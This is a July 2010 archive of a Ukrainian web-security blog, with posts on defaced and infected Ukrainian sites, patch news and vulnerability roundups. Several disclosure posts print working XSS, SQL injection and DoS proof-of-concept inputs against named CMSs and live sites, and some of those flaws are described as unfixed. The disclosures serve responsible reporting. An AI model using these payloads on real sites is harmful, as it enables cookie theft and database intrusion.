Архів за Липень, 2010

Похакані сайти №106

22:47 28.07.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.clarks.kiev.ua (хакером man1ac з KDS) - 15.07.2010, зараз сайт вже виправлений адмінами
  • http://policom-trade.com.ua (хакером XPANDA) - 25.07.2010, зараз сайт вже виправлений адмінами
  • http://www.net-parket.com.ua (хакерами з KDS)
  • http://sushido.com.ua (хакером SadrazaM) - 25.07.2010, зараз сайт не працює (немає контенту)
  • http://www.agrotimeteh.com.ua (хакерами з Prizreni Hackers Group) - 06.06.2010, зараз сайт вже виправлений адмінами

Вийшов WordPress 3.0

19:07 28.07.2010

У червні, 17.06.2010, вийшла нова версія WordPress 3.0.

WordPress 3.0 це перший випуск нової 3.0 серії. В ній додано чимало покращень порівняно з попередніми 2.9.x версіями, всього було зроблено 1217 покращень та виправлень багів.

Серед нових функцій і можливостей нової версії движка можна віділити наступні: нова тема по замовчуванню Twenty Ten, нові API для налаштування тем (що дозволяють налаштовувати фони, заголовки, короткі лінки, меню, типи постів та таксономії), обєднання WordPress та WP MU (що дозволить створювати багато-сайтову функціональність з однієї інсталяції) та більш легкий інтерфейс.

Серед нових покращень стосовно безпеки в WP 3.0 була зроблена наступна можливість. Відтепер на етапі інсталяції можна вказати логін адміна.

Численні уразливості в Cetera eCommerce

15:18 28.07.2010

05.06.2010

У жовтні, 31.10.2009, я знайшов Cross-Site Scripting, SQL Injection та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

28.07.2010

XSS:

http://site/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

На сторінці http://site/cms/templates/banner.php?bannerId=1
<script>alert(document.cookie)</script>В полях: Title, Текст.

SQL Injection:

http://site/cms/templates/banner.php?bannerId=1%20and%20version()=5

SQL DB Structure Extraction:

http://site/cms/templates/bannerlist.php?page=-1

Уразливі Cetera eCommerce 14.0 та попередні версії. Розробники в себе на сайт досі так і не виправили уразливості (окрім першої XSS).

Сліпа SQL ін’єкція

22:49 27.07.2010

Продовжуючи розпочату традицію, після попереднього відео про десктопний фішинг, пропоную новий відео секюріті мануал. Цього разу відео про сліпу SQL ін’єкцію. Рекомендую подивитися всім хто цікавиться цією темою.

A textbook example of Blind SQL Injection

В даному відео ролику на прикладі одного сайта розповідається про сліпі SQL Injection уразливості та методи їх використання. Рекомендую подивитися дане відео для розуміння векторів атак з використанням сліпих SQL Injection.

Липневий вівторок патчів від Microsoft

18:26 27.07.2010

В липні місяці Microsoft випустила 4 патчі. Що значно менше ніж у червні.

У липневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 4 бюлетня по безпеці. Що закривають 5 уразливостей в програмних продуктах компанії. В тому числі 3 патчі виправляють критичні уразливості, які дозволяють виконати довільний шкідливий код на віддаленому комп’ютері, а четвертий патч має “важливий” рейтинг.

Дані патчі стосуються таких продуктів Microsoft як операційні системи Windows XP, Windows Server 2003, Windows 7, Windows Server 2008 R2 та MS Office XP, Office 2003, Office 2007.

Зазначу, що в даному вівторку патчів була виправлена уразливість в Canonical Display Driver, що була виявлена ще в травні цього року, а також уразливість в довідковій системі Windows, що була виявлена в минулому місяці.

Добірка уразливостей

15:17 27.07.2010

В даній добірці уразливості в веб додатках:

  • Security Notice for CA Service Desk (XSS) (деталі)
  • Knowledgeroot (fckeditor) Remote Arbitrary File Upload Exploit (деталі)
  • SmartCMS v.2 SQL injection vulnerability (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • HP OpenView NNM snmpviewer.exe CGI Host Header Stack Overflow Vulnerability (деталі)
  • HP OpenView NNM ovalarm.exe CGI Accept-Language Stack Overflow Vulnerability (деталі)
  • HP OpenView NNM webappmon.exe CGI Host Header Buffer Overflow Vulnerability (деталі)
  • Joomla Component advertising (com_aardvertiser) File Inclusion Vulnerability (деталі)
  • Blind SQL injection vulnerability in NPDS REvolution (деталі)
  • XSS vulnerability in NPDS (деталі)

Інфіковані сайти №38

22:45 26.07.2010

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://tabulorasa.info - інфекція була виявлена 25.07.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://futbolka.info (та піддомен http://shop.futbolka.info) - інфекція була виявлена 24.07.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://kinoonline.tv - інфекція була виявлена 09.06.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://allcasting.com.ua - інфекція була виявлена 06.07.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://mgx.com.ua - інфекція була виявлена 21.07.2010. Зараз сайт входить до переліку підозрілих.

Численні уразливості в Mozilla Firefox, Thunderbird, Seamonkey

19:21 26.07.2010

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 3.5, Firefox 3.6, Thunderbird 3.1, SeaMonkey 2.0.

Численні пошкодження пам’яті, використання після звільнення, виконання коду, цілочислене переповнення, переповнення індексу масиву та інші уразливості.

  • Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability (деталі)
  • Mozilla Firefox DOM Attribute Cloning Remote Code Execution Vulnerability (деталі)
  • Mozilla Firefox CSS font-face Remote Code Execution Vulnerability (деталі)
  • Mozilla Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution Vulnerability (деталі)
  • Mozilla Firefox nsTreeSelection Dangling Pointer Remote Code Execution Vulnerability (деталі)
  • Mozilla Firefox NodeIterator Remote Code Execution Vulnerability (деталі)
  • SeaMonkey 2.0.5 Address Bar Spoofing Vulnerability (деталі)
  • Mozilla Foundation Security Advisory 2010-48 (деталі)
  • Mozilla Foundation Security Advisory 2010-47 (деталі)
  • Mozilla Foundation Security Advisory 2010-46 (деталі)
  • Mozilla Foundation Security Advisory 2010-45 (деталі)
  • Mozilla Foundation Security Advisory 2010-44 (деталі)
  • Mozilla Foundation Security Advisory 2010-43 (деталі)
  • Mozilla Foundation Security Advisory 2010-42 (деталі)
  • Mozilla Foundation Security Advisory 2010-41 (деталі)
  • Mozilla Foundation Security Advisory 2010-40 (деталі)
  • Mozilla Foundation Security Advisory 2010-39 (деталі)
  • Mozilla Foundation Security Advisory 2010-38 (деталі)
  • Mozilla Foundation Security Advisory 2010-37 (деталі)
  • Mozilla Foundation Security Advisory 2010-36 (деталі)
  • Mozilla Foundation Security Advisory 2010-35 (деталі)
  • Mozilla Foundation Security Advisory 2010-34 (деталі)

Уразливості на www.officepro.com.ua

15:10 26.07.2010

08.12.2009

У квітні, 22.04.2009, я знайшов Cross-Site Scripting та Denial of Service уразливості на сайті http://www.officepro.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на viland.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.07.2010

XSS:

POST запит на сторінці www.officepro.com.ua/search_result.html
"><script>alert(document.cookie)</script>В полі “Поиск товаров”.

Дана уразливість виправлена, але неякісно і при зміні коду, знову працює.

XSS:

POST запит на сторінці www.officepro.com.ua/search_result.html
" style="-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)В полі “Поиск товаров”.

XSS через GET:

DoS:

POST запит на сторінці www.officepro.com.ua/search_result.html
%%В полі “Поиск товаров”.

DoS уразливість вже виправлена, але XSS все ще працює.

Численні уразливості в MC Content Manager

23:53 24.07.2010

В 2007 та 2009 році я виявив численні уразливості в MC Content Manager. Це Cross-Site Scripting та SQL Injection уразливості, що я виявив на http://www.szru.gov.ua - сайті СЗРУ. Де використовується даний движок.

Всього я виявив 5 XSS та 3 SQL Injection уразливостей в MC Content Manager: 1 XSS 08.01.2007 і 1 XSS 23.09.2007 (які я вже оприлюднив і про які раніше вже повідомив адмінів сайта та які вже виправлені), 2 XSS та 2 SQLi 30.09.2007 (про які я повідомив приватно, тому інформація про них публікуватися не буде, з яких до сих пір виправлено лише 3 з 4), 1 XSS і 1 SQLi 10.04.2009 (які я вже оприлюднив і про які раніше вже повідомив адмінів сайта та які досі не виправлені).

XSS:

http://site/article.php?root=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/static.php?page=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cms/%3Cbody%20onload=alert(document.cookie)%3E/

SQL Injection:

http://site/cms/ua%20where%201=1–%20/

Уразливі ранні версії MC Content Manager від mc design (в скриптах на сайті СЗРУ версія CMS не зазначена). Остання версія MC Content Manager v.10.1.1 вже не вразлива (судячи по останнім сайтам цієї студії). Серед великої кількості сайтів розроблених mc design (що використовують MC Content Manager), перевірених мною цього місяця, я не знайшов жодних з даними уразливостями (на них використовуються або більш нові версії MC Content Manager, або інші компоненти), зате знайшов багато інших дірок в даному движку на різних сайтах. Про що я напишу з часом.